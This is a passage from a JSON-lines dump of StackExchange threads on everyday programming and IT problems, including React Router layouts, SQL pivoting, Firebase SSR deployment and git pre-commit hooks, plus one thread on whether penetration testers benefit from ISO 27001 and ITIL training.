<\/Layout>\n <\/Layout>\n )}\n <\/div>\n );\n}\n<\/code>\nWhen I open the AppRoutes component in the comments line in the content on the main layout page, it enters an endless loop and the browser stops responding and gives an error.\nWeb Browser\nAnswer: <code>AppRoutes<\/code> renders <code>MainLayout<\/code> which when rendering another <code>AppRoutes<\/code> renders another <code>MainLayout<\/code>... do you see the problem? This creates a \"render loop\" by infinite recursion.\nI suspect you meant for <code>MainLayout<\/code> to render an <code>Outlet<\/code> component for nested routes it may be rendering as a layout route.\n<code>import { Outlet } from 'react-router-dom';\n\n...\n\nexport function MainLayout() {\n ...\n\n return (\n <div style={{ .... }}>\n {isLoading ? (\n <Spin size=\"large\" \/>\n ) : (\n <Layout style={{ .... }}>\n ...\n <Layout className=\"site-layout\">\n <Header style={{ .... }} \/>\n <Content style={{ .... }}>\n <Outlet \/> \/\/ <-- for nested route content\n <\/Content>\n <Footer \/>\n <\/Layout>\n <\/Layout>\n )}\n <\/div>\n );\n}\n<\/code>\nIf you are intending for <code>MainLayout<\/code> to be a layout route component for all routes then it should wrap all routes. 
The <code>PrivateRoute<\/code> component should also be converted to a layout route component so it can wrap all routes that should be protected.\n<code>import { Navigate, Outlet } from 'react-router-dom';\n\nconst PrivateRoutes = () => {\n const { userToken } = useSelector((state) => state.auth);\n\n return userToken ? <Outlet \/> : <Navigate to=\"\/login\" replace \/>;\n}\n<\/code>\n<code>function AppRoutes() {\n return (\n <Routes>\n <Route element={<Login \/>} path=\"\/login\" \/>\n <Route element={<Register \/>} path=\"\/register\" \/>\n {\/* ... other non-main-layout routes *\/}\n \n <Route element={<MainLayout \/>}>\n <Route element={<ActivateEmail \/>} path=\"\/account\/activate\" \/>\n {\/* ... other unprotected routes *\/}\n\n <Route element={<PrivateRoutes \/>}>\n <Route element={<CityList \/>} path=\"\/city\/list\" \/>\n {\/* ... other protected routes *\/}\n <\/Route>\n\n <Route element={<NoMatch \/>} path=\"*\" \/>\n {\/* ... other main-layout routes *\/}\n <\/Route>\n <\/Routes>\n )\n}\n<\/code>\nComment: When I still click on the link there, another page opens instead of appearing in the content, it just does not contain the layout of that component.\nComment: As you mentioned, I noticed the problem, but I still can't solve it.\nComment: @Joseph Which links are you referring to, and *what* exactly is opening not where you expect it? With the current code you aren't rendering anything in the `MainLayout`. I'm guessing at this point what you are wanting is for all the routes (*`\".login\"`, `\"\/city\/list\"`, etc*) to render their content in the main layout? Is this a correct assumption?\nComment: @Joseph I'm going to also guess that you don't necessarily want to protect ***all*** the routes, e.g. `\"\/login\"`, so they are reachable by unauthenticated users?\nComment: As you can see in the main layout, I have a menu and for example an element in a menu goes to \/city\/list when I press it. I want to show the outputs of the component of this link in the content of the main layout. So I want to update the content as the layout hard link is updated. I hope I was able to explain\nComment: login should be blocked if logged in and if there is a token\nComment: I have attached as expectation-realized image\nComment: @Joseph Based on the image it seems I'm correct in that you want all the routed content to be rendered in the content section of the main layout component. I've updated my answer. If you want to prevent authenticated users from accessing the `\"\/login\"` route then create another protected route component that does the *inverse* of `ProtectedRoutes` and render the routes you don't want authenticated users to access inside it.\nComment: Now I get what I want, but it shows in content on login and registration pages and not as a separate page, how can I set it?\nComment: @Joseph Move those two routes out of the `MainLayout` layout route. I've updated answer again... hopefully the comments don't make it more difficult to understand how the routes and layouts are working.\nComment: I saw it later, thank you very much.\n","meta":{"source":"stackoverflow","title":"How can I add React router to the content section in the main layout?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should a penetration tester have training in ISO 27001\/ITIL etc?\n\nQuestion: I recently got offered a promotion but as part of the package I've been requested to do ISO 27001, ITIL, ARPA and other kinds of training. 
I've previously avoided this sort of training as I felt it would 'distract' me from my technical security knowledge.\nIn terms of penetration testing, are these qualifications useful? Do these provide good frameworks for penetration testing? I have zero aspirations to become a non-technical manager (at least for the foreseeable future) and compliance\/auditing doesn't interest me specifically. However, my knowledge around them is minimal so I'm curious if I should take them up on the offer or suggest technical training instead.\nAnswer: While it may not be the hardcore technical pentesting you are used to, it will definitely aid you in understanding processes and security controls within a company. This may help you to bring your findings in an understandable way to the business and IT management.\nObviously it also means you could do more than just pentesting as you could also write a standard or baseline (27001).\nDon't be afraid to try something new from time to time :).\nComment: In my experience it also allows you to manage pen test teams, sell the benefits of testing to risk and compliance officers, and generally widen your horizons... If you want to.\nAnswer: I've rarely found more knowledge to be a detrimental thing. It may not be super useful, but it may help in some rare scenarios.\nAnswer: Not of much benefit. I am a PenTester with both ITIL and ISO 27k certifications. While ITIL has hardly to do anything directly with information security and is very generic but can be effective in putting a process for faster incident response and change control. ISO 27k exists as standard and very broad guidelines for processes to be followed by any organization who takes InfoSec seriously. The standard also provisions for Audits to measure effectiveness of information security processes and controls. This audit can include both Source Code Analysis and Penetration Testing. Only way a Penetration Tester can find some use of this is to expect some level of security exists if the Organization is ISO 27k Certified. You won't be taught a single command when attending these trainings.\nThe knowledge of ITIL and ISO 27k will be required if you are trying to get a managerial role within big organizations. They like to measure everything and have metrics for nearly all process outcomes. 
ITIL and ISO 27k are more about process who has scope and mechanism built for continuous improvement.\n","meta":{"source":"security.stackexchange","title":"Should a penetration tester have training in ISO 27001\/ITIL etc?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Convert a row to column depending on Conditon\n\nQuestion: I have a table\nTable1\n<code>ID ItemNbr Seq ClassNbr Descr Amount ItmNbrSrc\nE0001 00000000001 001 10143 Physics 1000 \nE0001 00000000002 001 10144 Chemistry 1200 \nE0001 00000000003 001 10145 Biology 1500 \nE0001 00000000004 001 10143 Discount 01 100 \nE0001 00000000005 001 10144 Discount 02 200 \nE0001 00000000006 001 VAT 50 00000000001\nE0001 00000000007 001 VAT 60 00000000002\nE0001 00000000008 001 VAT 75 00000000003\nE0001 00000000001 002 10143 Physics 1100 \nE0001 00000000002 002 10144 Chemistry 1300 \nE0001 00000000003 002 10145 Biology 1700 \nE0001 00000000006 002 VAT 70 00000000001\nE0001 00000000007 002 VAT 80 00000000002\nE0001 00000000008 002 VAT 95 00000000003\nE0001 00000000009 001 TOEFL 100\nEOOO1 00000000010 001 VAT 5 00000000009 \n<\/code>\nDiscount Items always have Descr starting with \"Discount\"\nI want to print the Discount Values in Another Column against that ClassNbr\nand the value of VAT in another column which depends on ItmNbrSrc\nDiscount Items only have once instance per ClassNbr. We can have ClassNbr multiple times uniquely identified by ItemNbr+Seq\n<code>ID itemNbr Seq ClassNbr Descr Amount Discount VAT \nE0001 00000000001 001 10143 Physics 1000 100 50 \nE0001 00000000002 001 10144 Chemistry 1200 200 60 \nE0001 00000000003 001 10145 Biology 1500 0 75\nE0001 00000000001 002 10143 Physics 1100 130 0 \nE0001 00000000002 003 10144 Chemistry 1300 220 0 \nE0001 00000000003 004 10145 Biology 1700 0 0\nE0001 00000000010 001 TOEFL 100 0 5\n \n<\/code>\nI tried using Max(decode) with Group By but it didn't seem to work.\nAnswer: You could use window functions to re-assign the class number of <code>VAT<\/code> rows, then conditional aggregation to pivot the resultset:\n<code>select\n id,\n max(itemNbr) itemNbr,\n newClassNbr,\n max(case when descr <> 'VAT' and descr not like 'Discount%' then descr end) descr,\n max(case when descr <> 'VAT' and descr not like 'Discount%' then amount end) amount,\n max(case when descr like 'Discount%' then amount end) discount,\n max(case when descr = 'VAT' then amount end) vat\nfrom (\n select\n t.*,\n coalesce(classNbr, max(classNbr) over(partition by id, coalesce(ItmNbrSrc, ItemNbr))) newClassNbr\n from mytable t\n) t\ngroup by id, newClassNbr\norder by 2\n<\/code>\nDemo on DB Fiddle:\n\nID | ITEMNBR | NEWCLASSNBR | DESCR | AMOUNT | DISCOUNT | VAT\n:---- | ------: | :---------- | :-------- | -----: | -------: | --:\nE0001 | 6 | 10143 | Physics | 1000 | 100 | 50\nE0001 | 7 | 10144 | Chemistry | 1200 | 200 | 60\nE0001 | 8 | 10145 | Biology | 1500 | null | 75\nComment: I have edited my requirements after getting the results from your SQL. I apologize in advance.\n","meta":{"source":"stackoverflow","title":"Convert a row to column depending on Conditon","dup_signals":{}},"subset":"stackexchange"} +{"text":"Eclipse is slow, and hangs some times\n\nQuestion: My workspace has almost of 2 GB, and I am using Eclipse Ganymede with Tomcat 6.0 (as I am working on a dynamic web project). \nI am facing a bad development experience as Eclipse is so slow and even hangs on pressing Ctrl+Space.\nI think higher versions are more slow with my workspace. Please give suggestions on how to remedy this.\nComment: Ganymede? 
That's a quite old version. Try to update to a newer version (thinking they will be slower is OK, but you need to try them first). Also close projects you're not using, or try to make separate workspaces.\nComment: do you placed any breakpoints in your application\nComment: some times it might be the problem\nComment: Having a lot of RAM, a SSD and powerful CPUs certainly help. In case you run Linux, try the tool `atop` which shows current bottlenecks (disk? ram? cpu?).\nComment: 2GB is a one project or a couple? If few just close whose currently not use. The same with plugins, remove if you can remove and you dont need it.\nComment: i have i5 processor with 4GB RAM, I have tried new versions but found slow. and i have 2 project both are dependent so cant be closed\nAnswer: This may help\nIn your eclipse,\n1) Go to Help\n2) Click Eclipse marketplace\n3) search - optimizer\ninstall \"optimizer for eclipse\"\n","meta":{"source":"stackoverflow","title":"Eclipse is slow, and hangs some times","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to add textfield in iOS interactive notification\n\nQuestion: I want to develop interactive notification just like imessage . i read documentation and i tried with adding multiple UIMutableUserNotificationAction to UIMutableUserNotificationCategory and display it. i want to display textfield just like iMessage . this is my problem\n<code>UIMutableUserNotificationCategory *notificationCategory = [[UIMutableUserNotificationCategory alloc] init];\nnotificationCategory.identifier = @\"Email\";\n[notificationCategory setActions:@[notificationAction1,notificationAction2,notificationAction3] forContext:UIUserNotificationActionContextDefault];\n[notificationCategory setActions:@[notificationAction1,notificationAction2] forContext:UIUserNotificationActionContextMinimal];\n<\/code>\nplease help\nComment: Duplicate question and answer: http:\/\/stackoverflow.com\/questions\/25841227\/adding-text-field-in-remote-notificaton-ios-8\nComment: thanks @Flipper. worked like a charm.\nAnswer: <code>let replyAction = UIMutableUserNotificationAction()\nreplyAction.identifier = \"REPLY_ACTION\"\nreplyAction.title = \"Reply\"\nreplyAction.activationMode = UIUserNotificationActivationMode.Background\nreplyAction.authenticationRequired = false \nreplyAction.destructive = false\n\/\/Set behaviour to .TextInput \nreplyAction.behavior = .TextInput\n<\/code>\n","meta":{"source":"stackoverflow","title":"how to add textfield in iOS interactive notification","dup_signals":{}},"subset":"stackexchange"} +{"text":"Display loader only when api call will be longer then 1 sec\n\nQuestion: I have tried and I still trying to create a mechanism in Angular using rx that will display my loader, but only if the API call is longer than 1 second, if it is shorter I would not like to display it.\nI've tried many different ways, but I haven't been able to achieve what I need.\nThe closest I came to a solution was in this case:\n<code> const apiCall = this.searchService\n .query(this.query)\n .pipe(finalize(()=> this.loading = false));\n\n timer(1000)\n .pipe(takeUntil(apiCall))\n .subscribe(()=> {\n this.loading = true;\n })\n\n apiCall.subscribe(result => {\n \/\/do smth\n })\n<\/code>\nIn this case loader would be shown after the API request was completed, but it would immediately disappear becouse of finalize method (and it would also be called twice).\nDoes anyone have an idea on how to do something like this because I'm running out of ideas?\nComment: maybe an animation could work for that? 
Initial size of loading indicator would be 0,0... after 1 second delay it get's it's width\/height. (problem is if it takes 1.1 seconds you'd still have the sort of blinking in and out behavior I think you're trying to avoid)\nComment: Agree with @pcalkins, this kind of stuff is better handled with transitions. You can't predict how much it will take the call, so at any point you decide to blink in the loading spinner it could happen that in the next 100ms the call finishes. Just set the state to loading = true immediately, but make the spinner fade-in during 300ms\nAnswer: I haven't tested your code but my guess is your code will call the api twice and thats the reason it removes the loader on the first call and second call doesn't care about the loader at all. something like this should work.\n<code>const apiObservable = this.searchService.\n .query(this.query).pipe(startWith(null));\n\nconst isLoadingObservable = timer(1000).pipe(\n map(() => true),\n startWith(false),\n take(2),\n);\n\ncombineLatest(apiObservable, isLoadingObservable).pipe(\n tap(([resp, isLoading]) => this.isLoading = isLoading),\n filter(([resp, isLoading]) => resp !== null)\n).subscribe(resp => {\n this.isLoading = false;\n \/\/do smth\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Display loader only when api call will be longer then 1 sec","dup_signals":{}},"subset":"stackexchange"} +{"text":"Android Share Text on Facebook instead of Link\n\nQuestion: I am working on Text Sharing on From my Android Application . I have used the following code. \n<code>Intent sharingIntent = new Intent(Intent.ACTION_SEND);\nsharingIntent.setType(\"text\/plain\"); \nString text=\"http:\/\/google.com\";\nsharingIntent.putExtra(android.content.Intent.EXTRA_TEXT,text);\nsharingIntent.putExtra(android.content.Intent.EXTRA_SUBJECT, \"Message\");\nstartActivity(Intent.createChooser(sharingIntent, \"Share using\"));\n<\/code>\nIf I will this code means it shares link correctly and shows like following image !\nAttached Image \nWhen I am using normal text like \"sample content\" means it is not accepting and showing the text .... I need to share the text instead of that link .. please help me ... \nIts working correctly for Gmail and Twitter also. \nWaiting for better response..... Thanks in Advance \nAnswer: This is a limitation with the (stupid) Facebook app. They know about it, but apparently don't want to fix it.\nYour only option is to implement Facebook sharing using their API.\nComment: @Ollie.. By using Facebook API is it possible to get the user verification every time before posting the content... right now i have a sample like \"first time we need the registration .. if we done once .. by clicking share button it will post the content automatically in the Facebook wall ... neither i need User confirmation .... thanks in advance .....\nComment: I suggest asking a new question, and tagging it appropriately. Do remem ber to vote up answers and accept responses, as more people will reply to your questions in future.\n","meta":{"source":"stackoverflow","title":"Android Share Text on Facebook instead of Link","dup_signals":{}},"subset":"stackexchange"} +{"text":"12.04, Slow load, VMWare Player\n\nQuestion: Everything, including booting, apt-get install, and web browser page load is snappy, but anything that requires random disk IO seems to be slow. The examples include: application launch, sudo command, etc. Any reason why this would happen?\nI am using VMWare Play 4.0.4, 128GB SDD, 20GB allotted to the virtual disk. 
\nSo far I tried both Hardware Acceleration Enabled\/Disabled.\nI also ran iozone test for disk IO speed, which seems to be reasonably fast.\nI do no think I need to align my disk space as it should be managed by my primary OS, Windows 7. Could it be that this is VMWare issue?\nAnswer: I had a similar problem. I noticed that my BIOS had the multithreading setting, the Intel VT directed I\/O and the Intel VT-x setting disabled. I enabled them and it was much faster. The vmplayer is not a hypervisor, so I surprised why the Intel virtualization settings should have made a difference.\nOther things I did to improve the performance (thanks to suggestions on the Ubuntu forums) were to disable any 3D acceleration and using a lighter desktop (I used Xubuntu-desktop or Xfce4)\n","meta":{"source":"askubuntu","title":"12.04, Slow load, VMWare Player","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should I use setInterval() in a watcher?\n\nQuestion: I'm changing a React app that animates a binary tree to Vue. The vertex and edge components are conditionally rendered based on the value of a <code>time<\/code> prop. The react app works by using the <code>useInterval<\/code> hook to place a delay between rendering each vertex.\nReact:\n<code>useInterval(\n() => {\n if (time >= maxTimes) setIsUpdating(false)\n setTime((time) => (animate ? Math.min(time + 1, maxTimes) : maxTimes))\n},\nisUpdating ? DELAY_IN_MS : null\n)\n<\/code>\nIn order to implement in Vue, I figured I could watch for changes to the value of <code>time<\/code> and call a <code>setInterval<\/code> that incremements <code>time<\/code> some <code>DELAY_IN_MS<\/code> later:\nVue:\n<code>watch: {\ntime() {\n setInterval(\n () => {\n if (this.time >= this.maxTimes) {\n this.isUpdating = false;\n }\n this.time = this.animate\n ? Math.min(this.time + 1, this.maxTimes)\n : this.maxTimes;\n },\n this.isUpdating ? DELAY_IN_MS : null\n );\n},\n},\n<\/code>\nThis results in very fast rendering\/animation of components, however, and changing <code>DELAY_IN_MS<\/code> doesn't achieve intended results.\nShould I use <code>setInterval<\/code> somewhere other than in a watcher?\nI realize assigning a new value to <code>time<\/code> in it's watcher might be recursive and problematic. Is that the problem?\nComment: It's unknown how it originally worked in React and so how it should in Vue. It runs recursively because you never check if `time` value has changed in a watcher. Doing this in a watcher is most likely a mistake because you create a lot of intervals and never clean them up.\nAnswer: I think that the problem is that this inside of the setInterval 'this' doesn't reference anymore to vue instance.\nTo solve this problem I'd try something like creating a const to hold the 'this' that references to vue instance.\nThe code could be like this!\n<code>watch: {\ntime() {\n const vueThis = this;\n setInterval(\n () => {\n if (vueThis.time >= vueThis.maxTimes) {\n vueThis.isUpdating = false;\n }\n vueThis.time = vueThis.animate\n ? Math.min(vueThis.time + 1, vueThis.maxTimes)\n : vueThis.maxTimes;\n },\n vueThis.isUpdating ? DELAY_IN_MS : null\n );\n},\n<\/code>\n},\nI hope that it can help you!!\nComment: Thanks but this doesn't seem to make a difference\nComment: This is an arrow. 
`const vueThis = this` isn't needed since ES6.\n","meta":{"source":"stackoverflow","title":"Should I use setInterval() in a watcher?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Performance issue when upgrading from HornetQ to Artemis ActiveMQ\n\nQuestion: Has anyone experienced performance degradation when upgrading from HornetQ to Active Artemis? \u00a0I'm working on a system that upgraded from HornetQ 2.4.5.Final to Artemis 2.10.0 and am seeing a performance degradation. \u00a0Beginning investigation, but so far it appears the configuration\/setup is similar between the two. \u00a0 \nComment: Please share some metrics regarding to the performance degradation, as well as configuration\/setup data, and all other relevant information related to your issue!\nComment: Do you have any further details to add for this performance issue?\nAnswer: There have been lots of performance enhancements made to ActiveMQ Artemis since the donation of the HornetQ code-base to Apache so if anything I would expect it to be faster. However, there's certainly a chance that a particular use-case could be slower, and there's always the possibility of bugs. \nIt's worth noting that HornetQ 2.4.5.Final was tagged in October 2014 (the same month & year as the donation to Apache) and ActiveMQ Artemis 2.10.0 was tagged in August 2019 which is about 5 years difference. That's a significant gap in the life of an active software project. There have been over 7,000 commits to the ActiveMQ Artemis code-base during that time.\nYou would really need to describe your use-case in detail and quantify the performance degradation for any real investigation to be done.\n","meta":{"source":"stackoverflow","title":"Performance issue when upgrading from HornetQ to Artemis ActiveMQ","dup_signals":{}},"subset":"stackexchange"} +{"text":"White-box webpage testers\n\nQuestion: I wrote a webPage and i want to localy scan all files in search of somes common vulnerabilities.\nI searched on the internet a lot and i can't find white-box tools as I thought.\nInstead of this, there are many black-box tools.\nMaybe do you know some, free or maybe commercial tools for thats type of tests ? \nAnswer: This question is rather offtopic because product recommendations are not allowed in this site.\nAt the OWASP site you have some of applications of your interest.\n","meta":{"source":"security.stackexchange","title":"White-box webpage testers","dup_signals":{}},"subset":"stackexchange"} +{"text":"Drawing the volume generated by three vectors\n\nQuestion: I have three vectors:\n<code>v1={1,0,0} v1={0,1,0} v1=1\/2{1,1,1}\n<\/code>\nI wish to show the volume constructed by these vectors.\nI know the amount of this volume is calculated by\n<code>1\/2 Dot[Cross[{1, 0, 0}, {0, 1, 0}], {1, 1, 1}]\n<\/code>\nBut I do not know how to draw this volume!!!\nAnswer: Use <code>Parallelepiped<\/code>:\n<code>v1 = {1, 0, 0};\nv2 = {0, 1, 0};\nv3 = 1\/2 {1, 1, 1};\nGraphics3D[Parallelepiped[{0, 0, 0}, {v1, v2, v3}]]\n<\/code>\nComment: Assuming you mean the aspect ratio, `Show[Graphics3D[Parallelepiped[{0, 0, 0}, {v1, v2, v3}]], BoxRatios -> 1]`.\nComment: Thank you so much. 
But How to show this volume in a cubic with sides equal to 1\nAnswer: To include the vectors in the drawing:\n<code>v = {{1, 0, 0}, {0, 1, 0}, 1\/2 {1, 1, 1}};\n\n\u211b = Parallelepiped[{0, 0, 0}, v];\n\nGraphics3D[{\n {Opacity[0.7], \u211b},\n {Red, Arrowheads[0.05],\n Arrow[Tube[{{0, 0, 0}, #}, 0.01]] & \/@ v}},\n Axes -> True,\n BoxRatios -> {1, 1, 1}]\n<\/code>\n\nThe volume can be calculated multiple ways\n<code>{Volume[\u211b], RegionMeasure[\u211b], Integrate[1, {x, y, z} \u2208 \u211b]}\n\n(* {1\/2, 1\/2, 1\/2} *)\n\nSameQ @@ %\n\n(* True *)\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Drawing the volume generated by three vectors","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error while deploying react based SSR app, using firebase-functions\n\nQuestion: I am trying to deploy my SSR app in Firebase originally forked from, after doing some modification in the app.\nWhich works fine when I do <code>sudo firebase serve --only functions,hosting<\/code> but throwing error when I do <code>firebase deploy<\/code>.\nThe reproducible repo has a package.json.\nI am using the public directory as my function directory as well.\nHowever, even if I am using a different function directory for my cloud functions, I see the same errors.\nFunction failed on loading user code. Error message:\n<code>Code in file index.js can't be loaded. Is there a syntax error in your code?\nDetailed stack trace: TypeError: c(...) is not a function\nat Object.<anonymous> (\/user_code\/assets\/app.server.js:1:28950)\nat Object.module.exports.n (\/user_code\/assets\/app.server.js:1:29283)\n...\nFunctions deploy had errors.\nTo continue deploying other features (such as database), run:\nfirebase deploy --except functions\nError: Functions did not deploy properly.\n<\/code>\nComment: @SubhenduKundu today you asked a [question](https:\/\/stackoverflow.com\/questions\/64074523\/how-to-make-gird-with-fixed-numbers-of-columns-and-rows-always), I successfully solved that but you deleted that post so I am requesting you to re-post the same question... _**Plz tell me if you have already solved that**_\nComment: Would next.js fix this?\nComment: @carl Stackoverflow was suggesting it was duplicate and was asking me to delete the post, that was the reason I deleted no other intention. I thought it's a bad community practice having duplicate questions. I don't mind putting it back, if that helps \nComment: https:\/\/stackoverflow.com\/questions\/52861086\/how-come-minmax0-1fr-works-for-long-elements-while-1fr-doesnt\nAnswer: It is possible, but you cannot serve static assets with cloud functions. You need a mix of firebase functions and firebase hosting. \nThe guys at Firebase already thought on this and you also have an implementation available. \nCheck the following documentation: \n\nOverview\nDynamic Content\nCode Example\nYoutube Video\n\nNote: There is a delay that you need to take into consideration when using cloud functions. 
\n\nWhen a new instance handles its first request, the response time suffers, which is called a cold start\n\nMore info\nAnswer: The problem is that firebase hosting only supports SPAs, which means that SSR is out of the picture, you need to run your SSR server in a different env where you can run nextJS, or if you're using a static page generator you could upload the files directly compromising on the ability to refresh the content, although, I'm sure a solution with cloud functions and gatsby is feasable.\nTl;DR: You won't get SSR out of Firebase Hosting\nComment: I am using firebase functions https:\/\/github.com\/subhendukundu\/template-react-ssr\/blob\/feature\/react-router\/firebase.json.\nI am assuming SSR is posible using functions as https:\/\/howtofirebase.com\/firebase-ssr-starter-7dde175a0dbc\nComment: are you using uglify or minification on your firebase functions? as I mentioned above, it is possible to do SSR with firebase functions, and now with a little more context, I can see that you're working on top of a boilerplate. Make sure you are using the right features for the node version(6) that firebase functions use, also, you don't need to minify or transpile backend code unless you want to go through the trouble.\nComment: I tried both minified and unminified code, same issue. Now about the node version, if the code minified I am guessing doesnt matter, does it?\n","meta":{"source":"stackoverflow","title":"Error while deploying react based SSR app, using firebase-functions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Tag cleanup - Part 1 - Proposal\n\nQuestion: \nThis proposal has been completed. The results can be found on Tag cleanup - Part 1 - Results\n\nThis is the first step in cleaning up Pets' tags. Most steps I have sufficient rep to do myself, but I would like a community discussion beforehand. Here we go:\n\nTag creation proposal - to create a tag search-and-rescue (although I am flexible to an alternate tag name).\n\nExample question - What to do if I cannot find my cat?\n\nBasic tag description - Questions about finding a lost pet, or questions about lost pets in general, such as what to do if you find one.\n\nTag burnination - to burninate the tag community-faq.\n\nReasoning - This is not a relevant tag (aka a meta tag), meaning a tag that describes the actual post, not the problem at hand.\n\nProcedure - Edit the tag out and have it destroyed by a mod or staff so it can never be used again (insert evil laugh here).\n\nTag edits\/possible renames - shelter vs rescue-organizations.\n\nProblem description - Shelters and rescue organizations are sightly different things. However, the two tags seem to have alternating use. Both tags a) have unrelated questions that should be edited out, b) poor or no tag descriptions, and c) confusion over which to use.\n\nSolutions - a) edit out unrelated questions, b) add accurate tag descriptions, and c) either keep them separate with accurate descriptions or merge tags under a new name describing both shelters and rescues.\n\nAdditional information - Users seem to go either or for the two tags. However, shelter is less used (10 questions, 5 of which don't need it) than rescue-organization tag. We need to clear up the difference between the two and edit out the irrelevant questions. 
If the tags overlap too much, it may be best to merge them into one tag, something like animal-welfare-groups.\n\nTag synonyms - tags that mean the same thing or overlap with a different tag.\n\ntag clothes should be made synonyms with attire. And attire should have the \"collar\" part in its description removed because of tag leashes includes collars. Also collar should be made synonyms with leashes. To clarify, there would be two separate tags out of this bunch, attire would be one, which would include clothes and then leashes would now include collar and it would be made separate from attire.\nthe tags horse, goats, cows, sheep and pig (and similar) should be synonyms of farm-animals or, if we want separate farm animal tags, the tag farm-animals should be destroyed.\ntags showing, competitions, and possibly showmanship should be merged into one.\n\nThat's all for right now! Of course, fulfill your moral duty and edit out incorrect tags in questions, and add the correct ones. If this is successful, I hope to do some more tag work.\nPlease, add your answer on your thoughts on one or all of these points. Be nice and thank you for putting in your time to this somewhat tedious work!\nAnswer: \nDogs (and sometimes rats) are trained to do search and rescue, so I'd counter propose something like lost-pet instead. It's less confusing, and more... laypersony.\n\ncommunity-faq is a bit of a special case of meta tag. It's meant for questions that are asked super often, and the goal is to build a canonical resource for similar questions. Quite a few sites have it, and it's one of those things that should be more, not less.\n\nNo strong opinions here.\n\nIt might be useful to consider in trying to merge - collars and harnesses are things that interface with pets. Leashes interface to humans. Folks often have strong preference with respect to all 3! I don't think leashes is the 'right' main synonym, but I can't think of a single simple English language option that covers all 3.\nComment: I totally agree to 1. \"Search and rescue\" is a serious job for pets that requires regular training and specialized equipment. The first associations that come to my mind are mountain rescue and bomb sniffers. \"Lost pet\" is unambiguous and easy to understand\nComment: @Nai45 Look at that: we already *have* a [tag:lost-pet]\nAnswer: Concerning 3. (shelter vs rescue-organizations):\nThe one thing that's problematic is that shelter doesn't have a tag description, but the word has different meanings:\n\nprotection against the environment and weather;\nrefuge, asylum;\na place to live that's not your own;\na place where you can adopt pets.\n\nThe meaning and interchanging use may be caused by the different ways shelters work globally. There are countries where shelters euthanize animals after a very short time for a lot of reasons (including lack of space and adoptability of the animal) and there are countries where shelters are forbidden to euthanize for any reason but to prevent suffering. There are countries where rescue organizations offer common pets for adoption and other countries where they pick up injured wildlife (or feral stray cats) and release them back into the wild after nursing them back to health.\nDepending on where you live, each tag may mean a different thing. 
In my country, any place where you can adopt a pet would be called a \"shelter\", regardless of whether it's run by a rescue organization or not.\nI recently learned that shelters can have very different names in different countries, like \"animal\/community health center\" or \"animal sanctuary\". If people translate those local names into English, the most probable outcome is \"shelter\", even though the type of organization might be considered a \"rescue organization\" in other countries.\n\nMy proposal is to define shelter as a synonym to rescue-organizations and to add a proper description to housing (which has 0 questions) to make it mean \"shelter from the weather\".\nComment: Just a little update: I gave [tag:shelter] a proper description. Please have a look and see if it's easy to understand and as unambiguous as possible.\nComment: Nobody actually got notified about your comment, I found it right now by pure accident, I think it is better posted in some place with more traffic, I will copy it to litter box.\nComment: @Elmy Thanks so much! Very helpful.\n","meta":{"source":"pets.meta.stackexchange","title":"Tag cleanup - Part 1 - Proposal","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to feed RCA video into Iphone\/Ipad?\n\nQuestion: I am not an electrical engineer. How does one go about encoding rca video feed into an line-in \/ headphone jack so an app can decode and display the video? Is there another way tru the 30 pin or lighting connector? \nOther post here similar \nAnswer: So after long hours of investigation I think the best option is to get USB capture device and plug it in to a Source machine then just use http:\/\/skjm.com\/icam\/ to see the video. \nOne could use a live steaming Wifi devices like ones of these\nhttp:\/\/www.amazon.com\/Hauppauge-Broadway-HD-Streaming-Computers-Smartphones\/dp\/B005LMWPNM\n","meta":{"source":"stackoverflow","title":"How to feed RCA video into Iphone\/Ipad?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Git commit with pre-commit hook, why it get different results?\n\nQuestion: I have a pre-commit hook to run a python script that will modify the staged files and re-add those files with <code>git add .<\/code> at the end of the script.\nThe pre-commit look like this:\n<code>#!\/bin\/sh\npython2.7 .git\/hooks\/editfile.py\n<\/code>\nThe python script look like this:\n<code>import os\nimport mmap\nimport sys\nimport subprocess\n\ndef getmodifiedfiles():\n files = []\n args = ['git', 'diff', 'HEAD', '--name-only', '-r', '--diff-filter=M']\n with open(os.devnull, 'w') as b:\n files = subprocess.check_output(args, stderr=b).splitlines()\n\n files = [i for i in files if os.path.isfile(i)]\n return files\n\ndef updaterevision(line):\n strVer = line.split(\"$Revision: \")[1].split()[0]\n version = [x for x in strVer.split('.')]\n ver = [int(i) for i in version]\n\n if ver[1] == 99:\n ver[0] += 1\n ver[1] = 0\n else:\n ver[1] += 1\n\n strVer = \"%d.%02d\" % (ver[0], ver[1])\n return str.replace(line, line.split(\"$Revision: \")[1].split()[0], strVer)\n\ndef main(args):\n filelist = getmodifiedfiles() \n \n for file in filelist :\n lines = open(file).readlines()\n\n i = 0\n for line in lines:\n if '$Revision:' in line:\n lines[idx] = updaterevision(line)\n \n i += 1\n\n with open(file, 'w') as r:\n r.writelines(lines) \n\n args = ['git', 'add', '.']\n subprocess.call(args)\n \nif __name__ == '__main__':\n main(sys.argv)\n<\/code>\nIt works as expected with <code>git commit -m \"msg\"<\/code> command, when git status I got the 
following result:\n<code>On branch master\nYour branch is ahead of 'origin\/master' by 1 commit.\n\nnothing to commit (working directory clean)\n<\/code>\nBut if commit using <code>git commit <filename><\/code> or <code>git commit -m \"msg\" <filename><\/code>, I got the following result which I don't want:\n<code>On branch master\nChanges to be committed:\n (use \"git reset HEAD <file>...\" to unstage)\n\n modified: filename.py\n\nChanges not staged for commit:\n (use \"git add <file>...\" to update what will be committed)\n (use \"git checkout -- <file>...\" to discard changes in working directory)\n\n modified: filename.py\n<\/code>\nWhat are the different? I don't want to fix user to only use the first command to commit. Any ideas?\nComment: Can you provide your hook script? It matters a lot.\nComment: Going off of what @iBug said, could you provide the full script?\nComment: I'm hesitant to just close this as a duplicate, but see [this question](https:\/\/stackoverflow.com\/q\/65639403\/1256452).\nAnswer: Unfortunately, with your file-rewriting pre-commit hook, the only thing you can do is to stay away from <code>git commit <files...><\/code> and only use <code>git-add<\/code>-then-<code>git-commit<\/code>.\nThat said, you're not completely out of hope. Since your hook script is intended for rewriting files (setting \"version information\"), using filters 